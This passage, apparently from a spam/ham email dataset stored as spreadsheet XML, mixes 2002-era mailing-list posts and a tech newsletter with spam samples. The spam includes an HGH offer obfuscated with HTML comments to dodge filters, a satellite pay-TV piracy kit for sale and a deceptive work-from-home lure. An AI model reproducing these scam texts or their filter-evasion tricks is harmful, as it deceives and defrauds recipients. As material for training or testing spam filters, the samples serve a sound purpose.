 &lt;a href="http://211.99.37.206:81/ultimatehgh_run/"&gt;FOR FRE&lt;!--o--&gt;E INFO&lt;!--you--&gt;RMATION AND G&lt;!--love--&gt;ET FREE 
 1 MON&lt;!--jm--&gt;TH SUPPLY OF HG&lt;!----&gt;H CLICK HERE&lt;/a&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;
 You are recei&lt;!--jm--&gt;ving this email as a subscr&lt;!----&gt;iber&lt;br&gt;
 to the Opt&lt;!--jm--&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
 To remo&lt;!--jm--&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;
 just &lt;a href="http://211.99.37.206:81/ultimatehgh_run/remove.php?userid=jm@neteze.com"&gt; 
 Click Here&lt;/a&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_834464772P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Mon, 22 Jul 2002 13:33:13 -0500
 &gt;
 &gt; &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; &gt; Date:  Mon, 22 Jul 2002 20:15:11 +0200
 &gt; &gt;
 &gt; &gt; My feeling of this is that we really do not want to have a 
 &gt; &gt; Ftoc_ClearCurrent, but rather just a RescanLine and the caller had 
 &gt; &gt; better know the line or msgid. That routine shoud just put in the '+' 
 &gt; &gt; if the line/msg in question happened to be the cur msg. Thoughts?
 &gt; 
 &gt; Intuitively, that sounds right to me.  It does also call "tag remove", so 
 &gt; you'll have to make sure that gets set correctly as well.
 &gt; 
 &gt; I think any changes that make it behave more intuitively are a good thing even 
 &gt; if they mean we have something else to fix.  Of course, that attitude is why 
 &gt; I've been fixing exmh bugs for 3 weeks.
 I just checked in a code cleanup which doesn't address this issue, but does 
 take a machete to code right around it.  You ought to 'cvs update' and see if 
 your issue becomes any clearer with all the brush removed.
 My patch notes that 'msgid' and 'line' are redundant with one another and removes 
 one or the other from functions which takes both.  The callers are then 
 changed to pass what the function expects.  In the case of Msg_Change, the 
 'line' argument is removed and we only have the msgid argument.  Ftoc_ClearCurrent
 is now the first line of MsgChange.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_834464772P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9PHoCK9b4h5R0IUIRAl9kAJ9C/pnFLKlVYbRToLtffnXa+ffZJwCfahTx
 BE9ZJXQ6LnbKyCuhuS3IJBg=
 =aAkz
 -----END PGP SIGNATURE-----
 --==_Exmh_834464772P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: All Satellite Channels Free !!                     18441
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;font size=3D"5"&gt;&lt;font color=3D"red"&gt;&lt;b&gt;Get All Satellite Channels Free !!
 &lt;/b&gt;&lt;/font&gt;&lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;blockquote&gt;
 &lt;ul&gt;
 &lt;font size=3D"4"&gt;&lt;font color=3D"blue"&gt;
 Now your can program your satellite system to get all&lt;BR&gt;
 channels free. This include Direct Tv, Dishnetwork &lt;BR&gt;
 and Gla. Our satellite programming packages comes with&lt;BR&gt;
 everything your need to program your satellite system.&lt;BR&gt;
 The software is ease as 1,2,3 to use and it takes less&lt;BR&gt;
 that 5 minute to program your satellite system. There &lt;BR&gt;
 are company that will charge you up to $600 to do this&lt;BR&gt;
 for you and everytime your card needs to be reset they &lt;BR&gt;
 charge you an extra $100.00 Now you can do it yourself for :&lt;BR&gt;&lt;BR&gt;
 &lt;font size=3D"5"&gt;&lt;font color=3D"brown"&gt;&lt;b&gt;Only $99.00
 &lt;/b&gt;&lt;/font&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;font size=3D"4"&gt;&lt;font color=3D"red"&gt;&lt;b&gt;
 &lt;a href=3D"mailto:satplus2020@yahoo.com"&gt;Email us &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
 for order information.
 &lt;/ul&gt;
 &lt;/blockquote&gt;
 &lt;/center&gt;
 &lt;html&gt;
 &lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;html&gt;&lt;p&gt;&lt;BR&gt;&lt;p&gt;&lt;center&gt;&lt;p&gt;&lt;font size=3D"4"&gt;&lt;font color=3D"blue"&gt;&lt;b&gt;&lt;p&gt;Fre=
 e sports, Free xxx Movies, Free Pay perview.&lt;p&gt;&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;&lt;BR&gt;&lt;p&gt;=
 &lt;center&gt;&lt;p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 3 Aug 2002, kevin lyda wrote:
 &gt; sites like this make me question my opposition to capital
 &gt; punishment.
 :)
 &gt; "This month's Q&amp;A: Is it better to prepend or append disclaimer
 &gt; statements?"  augh!  and they admit they're pointless - in reality
 &gt; they're just the legal world's version of mandatory email fashion
 &gt; accessories.
 not legal, more management/corporate fashion. cause most of the
 actual /legal/ opinion on the web i've found on the web indicates:
 1. they should be used /sparingly/
 blanket pre/appending of disclaimers /dilutes/ any legal
 effectiveness they have.
 2. they are not binding, and have little meaning other than in 
 certain situations.
 they are not binding. 
 though there are some situations where for proffessional reasons one
 may wish to indicate the standing of an email. (eg legal advice "this
 is / is not legal advice" type of thing. But again, this means 
 disclaimers need to context-specific. (see 1.)
 3. there is precedence that blanket disclaimers, under UK law, have 
 no standing and that rather (common sense this) it is the context of 
 the situation that determines the legal effects of an email.
 See the norwich union case. 
 Anyway, my top tips to help superiors who've fallen for disclaimers 
 to see sense:
 1. server side appends breaks email standards. (unless always done 
 correctly - nearly impossible, cause then server has to understand 
 every possible type of client encoding).
 1a. it /does/ break certain types of encryption, that depend on the 
 body being untouched. (eg X.509? kate brought this up ages ago).
 1b. iirc, it contravenes MIME to pre/append non mime-typed text. Most 
 mailers will work around this and display the mail 'correctly', some 
 might not though. Eg the message might not be displayed, or the 
 disclaimer might not be displayed.
 1c. the correct place for disclaimers is on the client side. this 
 also allows the user to select appropriate disclaimer for appropriate 
 context (or no disclaimer at all).
 2. blanket appended disclaimers are of dubious legal effectiveness. 
 (dilution, NU case in UK)
 3. generic disclaimer text is of dubious legal effectiveness. indeed
 it will often be completely inappropriate ('this message is
 confidential' on list mail). see 1c. Also, it needs to be written by 
 an actual lawyer.
 4. A lot of big multinational corporations do /not/ append 
 disclaimers. (ones i know of: Compaq (deceased), Motorol (iirc), 
 Microsoft (iirc)).
 Useful link:
 http://www.goldmark.org/jeff/stupid-disclaimers/
 (and see links at bottom of this page).
 finally, if you cant get reason to prevail and you have to agree to
 implementing server side disclaimers, you can still resort to:
 	"that'll be done just as soon as the company stationary has
 	disclaimers printed on them. oh, and i guess we'll have to play a
 	disclaimer before or after all our telephone calls too? 
 	Wait, that would cause a problem for faxes wouldnt it?"
 &gt; kevin
 Disclaimer: IANAL, all the above might be wrong, i might even be 
 intentionally misleading you. who knows.. go check it out for 
 yourself.
 regards,
 -- 
 Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
 	warning: do not ever send email to spam@dishone.st
 Fortune:
 A real patriot is the fellow who gets a parking ticket and rejoices
 that the system works.
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020717.html"&gt;
       http://www.lockergnome.com/issues/daily/20020717.html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&lt;/style&gt;&lt;title&gt;20020717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href="http://click.linksynergy.com/fs-bin/click?id=vdKWfulJxTQ&amp;offerid=36698.10000263&amp;type=4&amp;subid=0"&gt;&lt;IMG  width="468" height="60" alt="10354" border="0" src="http://www.winnetmag.com/linkshare/banners/10354.gif"&gt;&lt;/a&gt;&lt;IMG border="0" width="1" height="1" src="http://ad.linksynergy.com/fs-bin/show?id=vdKWfulJxTQ&amp;bids=36698.10000263&amp;type=4&amp;subid=0"&gt;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07.17.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;FREE COLOR PRINTERS FROM XEROX - $4,500 VALUE&lt;/b&gt; Enroll in the Xerox FreeColorPrinters program and get a Phaser network color printer for FREE.  Small businesses, schools and non-profits have been participating in this risk free program since 1999. &lt;a href="http://psstt.com/1/c/22869/64298/191532/191532"&gt;Learn more&lt;/a&gt;.  
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Falling asleep at the wheel is no laughing matter. Still, it kinda
 happened with &lt;a href="http://www.lockergnome.com/issues/daily/20020716.html"&gt;yesterday's
 tip&lt;/a&gt;. I forgot to mention that the String value's label
 is "Logging" (sans quotes). That was almost like a cliffhanger,
 eh? The oversight was totally my fault. I've been thinking about
 asking Gretchen and Brian to help with future reviews. Don't be
 surprised if that happens soon. I'm sure you'd welcome a female
 perspective on this stuff, right? She helped one of our landlords
 pick a paint color for the "office" wall this evening. Does that
 qualify her to talk about cool stuff that we find for you on the
 Internet? You betcha. Let's see how she does with the drapes and
 rugs. I have a feeling I'll be the one tweaking furniture layout.
 Shouldn't be too much of an issue - yet. I wonder if Ikea has an
 affiliate program?
 &lt;p&gt;
 I've mentioned how Yahoo Mail's beta is mangling our commas, but
 did you know that it's also (possibly) rewriting your e-mail? If
 you send an HTML message to someone who has a yahoo.com account,
 something may get lost in the translation. Try sending this
 sentence: "My medieval mocha has an expression to evaluate."
 Again, be sure this note is sent in HTML format. The results will
 surprise you. As far as I can tell, they're doing this to stop any
 scripts from being distributed to their user base. I must credit
 Marion Schroll for making me aware of the "problem." It's kinda
 funny, in a weird sort of way. Not that I would want anything I
 send changed in any way, shape, or form. It begs the question:
 what next? I mean, where does it all stop? Give them a bit, and
 they just might take a byte. Censorship is only a stone's throw
 away.
 &lt;p&gt;
 I really feel for Lockergnomie Sharon Clark, who asks: "What is
 this crazy business with the broadband metering? What they
 advertise doesn't seem to be what you get. Now that I'm forking
 out $60 per month for a supposed metered rate of 640 down / 320
 up, I'm feeling clueless and left out in the cold. Not sure what
 I'm paying for, not sure what's going on at the office, not sure
 if I'm capped, not sure if I'm getting ripped off! Can you help me
 out here? I'm feeling lied to; why can't I download 'til my 40 gig
 is full? That is what they promised me and that is what I THOUGHT
 I was paying for. I want consistent speed - is this too much to
 ask?" It's not too much to ask the question, but it's probably too
 much to get the answer. I'm facing the same dilemma right now,
 even though cable-based connectivity isn't available in my area.
 Expect more and more "filters" to be put in place as time marches
 on. Watch those EULAs, folks.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class="title"&gt;&amp;nbsp;GnomeDOWNLOADS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table align="right" bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"&gt;&lt;tr&gt;&lt;td&gt;&lt;table align="left" bgcolor="#990000" cellspacing="0" cellpadding="2"&gt;&lt;tr&gt;&lt;td&gt;&lt;table border="0" cellpadding="4" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td align="center" valign="middle" bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;&lt;B&gt;Latest Downloads&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A title="freeware: anti-virus tool" HREF="http://www.mywebattack.com/gnomeapp.php?id=100279"&gt;AntiVir PE 6.14.00.63&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: mass-rename MP3 files" HREF="http://www.mywebattack.com/gnomeapp.php?id=104508"&gt;MP3 Rename 7.1.4.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: Outlook Express add-on" HREF="http://www.mywebattack.com/gnomeapp.php?id=104554"&gt;OE-QuoteFix 1.15.5&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: anti-virus scanner" HREF="http://www.mywebattack.com/gnomeapp.php?id=104681"&gt;AntiVir PE f 6.14.00.63&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: P2P file search without sharing" HREF="http://www.mywebattack.com/gnomeapp.php?id=104590"&gt;MyKazaa 1.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: delete old temporary files" HREF="http://www.mywebattack.com/gnomeapp.php?id=104511"&gt;EraseTemp 3.1.0.2&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: MP3 player" HREF="http://www.mywebattack.com/gnomeapp.php?id=104298"&gt;ZAP Audio Player 1.20&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: powerful email program with many features" HREF="http://www.mywebattack.com/gnomeapp.php?id=102683"&gt;PocoMail 2.61.1056&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: stress test for web servers" HREF="http://www.mywebattack.com/gnomeapp.php?id=103786"&gt;Webserver Stress  5.3.4&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: digital photo manager and processor" HREF="http://www.mywebattack.com/gnomeapp.php?id=104925"&gt;PhotoMeister 1.04&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: eliminate browser pop-ups" HREF="http://www.mywebattack.com/gnomeapp.php?id=104548"&gt;PopupWar 3.0.75&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: manage your hard disk" HREF="http://www.mywebattack.com/gnomeapp.php?id=104398"&gt;Disk Triage 6.3.1.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: software deployment manager" HREF="http://www.mywebattack.com/gnomeapp.php?id=104235"&gt;Broccoli ADS 2.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: e-mail routing utility" HREF="http://www.mywebattack.com/gnomeapp.php?id=102083"&gt;Mail REDirect 1.3.240&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: image viewer" HREF="http://www.mywebattack.com/gnomeapp.php?id=102191"&gt;Mindex Image Vie 2.7.16&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;Directory Lister v0.5.2 [547k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://freeware.prv.pl/"&gt;http://freeware.prv.pl/&lt;/a&gt;
 &lt;p&gt;
 {List directory contents} When I was younger, I'd get so frustrated at those games where you'd have to pick out all of the subtle differences between two pictures. I'd always end up with one or two that I just could never see. When I want to do the same type of comparison between two directories on my computer, I use Directory Lister and I never miss a thing. Not only does Directory Lister display the contents of your chosen directories, it will also let you save the output to an HTML file. This is great for web developers who want a quick way to list the contents of a ZIP file before archiving it and uploading it to their website. As an added bonus, Directory Lister also shows the date, time, and attributes of the files in your directory, making it easier than ever to compare the differences in files between two directories.
 &lt;p&gt;&lt;br&gt;
 &lt;b&gt;Web Calendar [25k] W2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://members.lycos.co.uk/bleucanard/WebCalendar.htm"&gt;http://members.lycos.co.uk/bleucanard/WebCalendar.htm&lt;/a&gt;
 &lt;p&gt;
 {Web page reminder} Surfing the web as much as I do, I'll occasionally run into a site or page that commits the horrendous faux pas of displaying an "Under Construction" banner. I COULD forget about the site and maybe somehow encounter it later, or I COULD drop the site into Web Calendar and have this handy-dandy app remind me to check the page again in a week. The same technique holds true for my normal browsing... for example, I can use Web Calendar to remind me to check out the Digital Media newsletter every morning, or to check Amazon for a CD that I know will be released in a week. Now, I will have no excuse for missing the DVD release of "Lord of the Rings"...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&lt;b&gt;SQLView v2.1.0.20 [5.2M] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href=""&gt;http://mywebpages.comcast.net/fredbubbers/software/&lt;/a&gt;
 &lt;p&gt;
 {View ODBC Output} SQLView is "A SQL Database viewing utility. (It) automatically detects all available ODBC data sources and displays them in an explorer-like tree. User(s) may double-click on data sources to access the databases, browse tables, execute custom queries and export (the) data to .CSV or .XML files." I didn't really have much on my machine to throw at this program. However, the one data source I did have (mostly related to Music CD creation) displayed perfectly in SQL View. (And I have the .csv file to prove it!  Nyah!)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&lt;b&gt;CollegeBAR v8.0 [5.9M] W9x/2k/XP US$20&lt;/b&gt;&lt;br&gt;
     Unearthed by Shawn Verrall
 &lt;p&gt;
 &lt;a class="URL" href="http://www.pracx.com/collegebar.asp"&gt;http://www.pracx.com/collegebar.asp&lt;/a&gt;
 &lt;p&gt; 
 {Mix your own drinks} When I was in college, my room used to be known as "The Bar." It may have had something do with my L-shaped desk that resembled a bar, and the fact that I had seen the movie Cocktail too many times and wanted to be a bottle-flipping bartender. I never achieved my goal of being the world's best geek bartender, but maybe with College Bar I could have. College Bar contains recipes for over 11,600 drinks. With an online update feature, you can download new drinks as they become available... or you can add your own creative concoctions to the database! College Bar also has a calculator to determine someone's blood alcohol level... drink responsibly, folks. As an added bonus, you can load some of your favorite party pictures into the program and you'll see a slide show of those pictures - a great way to remember the good times... unless you don't remember experiencing them in the first place, that is. Dude, where's my car?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border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Buy One Inkjet Cartridge - GET TWO FREE!!&lt;/b&gt; Buy 1 Get 2 FREE on Most Epson, Canon, and Apple Cartridges. Wholesale Pricing on Lexmark Cartridges. Free Shipping on orders $25 or more!! U.S. Shipping Only. &lt;a href="http://psstt.com/1/c/22869/56049/191532/191532"&gt;Click Here For a Complete List of Cartridges&lt;/a&gt;.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;b&gt;Beliefnet&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href=""&gt;http://www.beliefnet.com/&lt;/a&gt;
 &lt;p&gt;
 {Daily enlightenment} Whether you're Buddhist, Hindu, Muslim, Christian, Jewish, or anything else, Beliefnet.com has something for you. You can sign up for any of the ten Beliefnet newsletters - there's even one devoted to religious jokes. However, if you aren't looking for enlightenment for your Inbox, then just feel free to browse around. You're sure to find something interesting in the Inspiration section; the Parenting section has helpful features and articles. Or, test your savvy with "Stump Our Bible Expert." If you're seeking something new in the way of your spirituality, or are looking for some affirmations of your existing beliefs, it's likely you'll find it at Beliefnet.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I am a sucker for keyboard shortcuts. Anything that can save me from using the mouse is good in my book. Occasionally I like to view the web or Windows Explorer in Full Screen mode... to do this I just hit F11 on the keyboard and there I am in Full Screen mode. Hit it again and I am back to regular mode. If you aren't as much of a fan of keyboard shortcuts as me, then all you have to do is press and hold the Ctrl key while clicking on the Maximize button and you will have the same effect. You will notice, however, that your Start Menu isn't anywhere to be seen. Never fear, another keyboard shortcut is here... just press Ctrl key plus the Esc key and your Start Menu will be back where it belongs. Alternatively, if you have a Windows key on your keyboard you can use that key to bring up your Start Menu as well.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href="http://www.lockergnome.com/issues/daily/20020717.html"&gt;http://www.lockergnome.com/issues/daily/20020717.html&lt;/a&gt;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Medieval Mocha  --&gt;
 The "ZIP" in Zip Code stands for "Zoning Improvement Plan."
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Help wanted.  We are a 14 year old fortune 500 company, that is
 growing at a tremendous rate.  We are looking for individuals who
 want to work from home.
 This is an opportunity to make an excellent income.  No experience
 is required.  We will train you.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.basetel.com:27000/wealthnow
 We are looking for energetic and self motivated people.  If that is you
 than click on the link and fill out the form, and one of our
 employement specialist will contact you.
 To be removed from our link simple go to:
 http://www.basetel.com:27000/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">
  Quoting Ronan Waide &lt;waider@waider.ie&gt;:
  &gt; Sure, but soft links would do the same. To be honest, I'm trying to
  &gt; think of a useful use of hard links right now, and I'm a little
  &gt; stumped. There's gotta be some benefit that I'm missing that's
  &gt; immediately obvious to everyone.
 No there doesn't :-) . The Bell labs Unix people implemented hard
 links, whereas Bill Joy and co. at Berkeley implemented soft links,
 five years later, mainly to get around not being able to do
 cross-device hard linking, as I understand it. Soft links are fairly
 classic Berkeley hackery (cf. gethostbyname, h_errno, and the
 resultant problems implementing mt-safe interfaces); they do what they
 were intended for, but break fairly easily, in this case when the
 target file was deleted. For a better design for similar ideas, see
 the MacOS.
 -- 
 I'm not a pheasant plucker / I'm a pheasant plucker's son.
 I'm just a'plucking pheasants / 'Til the pheasant plucker comes.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"&gt;
 &lt;HTML&gt;
 &lt;TABLE id=AutoNumber2 style="BORDER-COLLAPSE: collapse" 
       borderColor=#111111 cellSpacing=1 cellPadding=0 width=715 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=27&gt;&lt;a href="http://www.frugaljoe.com"&gt;&lt;IMG  
             src="http://www.frugaljoe.com/logo.jpg"  border=0&gt;&lt;/a&gt;&lt;/TD&gt;
           &lt;TD width=1 bgColor=#ffcc99&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;&lt;/TD&gt;
           &lt;TD vAlign=top&gt;&lt;I&gt;&lt;B&gt;&lt;FONT face=Verdana size=2&gt;
             &lt;CENTER&gt;Never Pay Retail!&lt;/FONT&gt;&lt;FONT face=Verdana size=0&gt;&lt;/B&gt;&lt;br&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;IMG height=20 
             src="http://www.salealerts.com/dot.gif" width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=715 bgColor=#ffcc99 colSpan=3 height=1&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 
   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/TD&gt;
 &lt;FONT face=Verdana size=1&gt;
 &lt;HEAD&gt;
 	&lt;TITLE&gt;chdvd.com from Columbia House&lt;/TITLE&gt;
 	&lt;META NAME="generator" CONTENT="BBEdit 5.1.1"&gt;
 &lt;/HEAD&gt;
 &lt;body leftmargin="10" topmargin="0" marginwidth="10" marginheight="0" bgcolor="#ffffff" link="#000000" vlink="#000000"&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="511" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td width="511"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/se2/email/online_ad/chdvd_header_new.gif" width="511" height="27" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!--Dear Member--&gt;
 &lt;table cellpadding="10" cellspacing="0" border="0" width="500" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font size="-2" face="verdana, arial, sans-serif"&gt;The Columbia House DVD Club is the best way to build your DVD
 collection. Check out today's best sellers like Ocean's 11, Harry
 Potter and the Sorcerer's Stone, Gladiator and many more! Join now and
 you can...&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="500" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td width="5" rowspan="3"&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td align="center" valign="bottom"&gt;&lt;BR&gt;&lt;font size="4" color="#cc0033" face="verdana, arial, sans-serif"&gt;&lt;B&gt;Get 4 DVDs for 49&amp;cent; each!&lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align="center" valign="top"&gt;
 &lt;font face="verdana, arial, sans-serif" color="#000000"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;font size="-3" face="verdana, arial, sans-serif" color="#000000"&gt;&lt;i&gt;shipping &amp;amp; processing only $1.99 per DVD&lt;/i&gt;&lt;/font&gt;&lt;BR&gt;&lt;BR&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align="right" valign="bottom"&gt;&lt;font size="-3" face="verdana, arial, sans-serif"&gt;&lt;a href="http://adfarm.mediaplex.com/ad/ck/990-1736-5138-61"&gt;&lt;i&gt;Details&lt;/i&gt;&lt;/a&gt;&lt;/font&gt;&lt;BR&gt;&lt;BR&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!--End Dear Member--&gt;
 &lt;!--Selection of the Month--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="232" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="5" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td align="right" valign="top"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/se2/email/online_ad/left_curve_new.gif" width="6" height="15" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" align="center"&gt;&lt;font size="-2" face="verdana, arial, sans-serif" color="#ffffff"&gt;&lt;B&gt;SPOTLIGHT&lt;/B&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td align="left" valign="top"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/se2/email/online_ad/right_curve_new.gif" width="6" height="15" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="511" bgcolor="#ffffff"&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#6666cc" width="1" rowspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="1" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="9" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="491" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="491" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#6666cc"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="9" height="1" alt=""&gt;&lt;/td&gt;
 &lt;td bgcolor="#6666cc" width="1" rowspan="2"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="1" height="1" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="5" align="left"&gt;
 	&lt;table cellpadding="0" cellspacing="0" border="0" width="501" bgcolor="#ffffff"&gt;
 	&lt;TR&gt;&lt;TD colspan="7"&gt;&lt;img src="http://a248.e.akamai.net/f/1596/1167/1d/images.columbiahouse.com/ch/images/demo/email/clear.gif" width="1" height="10" alt=""&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 	&lt;td width="15"&gt;&amp;nbsp;&lt;/td&gt;
